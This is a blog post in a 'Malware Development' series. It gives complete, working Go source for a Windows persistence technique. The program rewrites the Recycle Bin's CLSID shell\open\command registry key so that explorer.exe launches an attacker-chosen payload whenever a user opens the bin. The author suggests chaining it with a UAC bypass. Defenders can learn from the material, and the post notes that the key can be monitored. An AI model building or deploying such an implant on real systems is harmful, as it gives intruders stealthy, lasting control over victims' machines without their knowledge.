Post

Malware Development 3 - Persistence via Recycle Bin (Golang)

Posted
By D3Ext
3 min read

pic

Introduction

Hello dear hackers!

Today we’re gonna see an effective technique to mantain access in Windows systems during red team operations just by modifying a registry key which interacts with the Recycle Bin. I don’t know if any APT group uses this technique but I read about it in a vxunderground paper (see here) and I thought it may be interesting to try in Golang so let’s see how it works

Explanation

In Windows there are some folders which have have uniques CLSID values like the ones for the “Recycle Bin” {645ff040-5081-101b-9f08-00aa002f954e} or the “My Documents” {450d8fba-ad25-11d0-98a8-0800361b1103}

All of this may sound familiar to you if you’ve ever tried the fodhelper.exe UAC bypass in which the registry HKCU is modified to execute commands as administrator without any confirmation.

Code

First of all we must import the necessary packages. In this case we’ll use the official Golang package to interact with registry keys

1
2
3
4
5
6
7
8

package main

import (
  "fmt"
  "log"

  "golang.org/x/sys/windows/registry"
)

We have to open the CLSID registry key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

...

bin_key, err := registry.OpenKey(
  registry.LOCAL_MACHINE,
  "SOFTWARE\\Classes\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell",
  registry.WRITE, // Permissions
)

if err != nil {
  fmt.Println("OpenKey error!")
  log.Fatal(err)
}
defer bin_key.Close()

...

Then we create the new registry where our malicious commands will be

1
2
3
4
5
6
7
8
9
10
11
12
13
14

...

k, _, err := registry.CreateKey(
  bin_key,
  "open\\command",
  registry.ALL_ACCESS,
)

if err != nil {
  fmt.Println("CreateKey error!")
  log.Fatal(err)
}

...

And finally we set the value, in our case it’s a simple notepad but you could be creative to combine it with other things like UAC bypass and more

1
2
3
4
5
6
7
8

...

err = k.SetStringValue("", "notepad.exe")
if err != nil {
  log.Fatal(err)
}

...

Let’s add more output and the final code should be something like this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56

package main

/*

Author: D3Ext
Blog post: https://d3ext.github.io/posts/malware-dev-3/

*/

import (
  "fmt"
  "log"

  "golang.org/x/sys/windows/registry"
)

func main(){

  // Open registry key
  fmt.Println("Opening registry key...")
  bin_key, err := registry.OpenKey(
    registry.LOCAL_MACHINE,
    "SOFTWARE\\Classes\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell",
    registry.WRITE,
  )

  if err != nil { // Handle error
    fmt.Println("OpenKey error!")
    log.Fatal(err)
  }
  // Close key
  defer bin_key.Close()

  // Create new key
  fmt.Println("Creating new key...")
  k, _, err := registry.CreateKey(
    bin_key,
    "open\\command",
    registry.ALL_ACCESS,
  )

  if err != nil { // Handle error
    fmt.Println("CreateKey error!")
    log.Fatal(err)
  }

  // Set value
  fmt.Println("Setting notepad.exe as our payload...")
  err = k.SetStringValue("", "notepad.exe")
  if err != nil { // Handle error
    fmt.Println("SetStringValue error!")
    log.Fatal(err)
  }

  fmt.Println("Process completed!")
}

Now we compile our payload and transfer it to our Windows testing machine

pic

I haven’t read anywhere if this operation can be done without administrator privileges but testing in my Windows it always returned “Access denied”

pic

Be careful with your payload because testing with cmd.exe and notepad, I created an infinite loop and I had to restart my PC

As you can see after clicking the recycle bin icon a notepad.exe appears

pic

Now if we search the parent process id (PPID) of the notepad.exe we see that it’s executed under explorer.exe process

pic

To revert our modifications you can simply execute this powershell command reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f and it should work for you

References

1
2

https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf
https://blog.amartinsec.com/posts/recyclebin/

Conclusion

This persistence technique can be useful for red teamers as it’s stealthy and everyone use the recycle bin to delete files so the payload would be executed whenever a user access to it. But the registry key can be monitored to prevent this so blue teamers should have this technique in mind

Source code here in my Github

Go back to top

Malware Development
Persistence
This post is licensed under CC BY 4.0 by the author.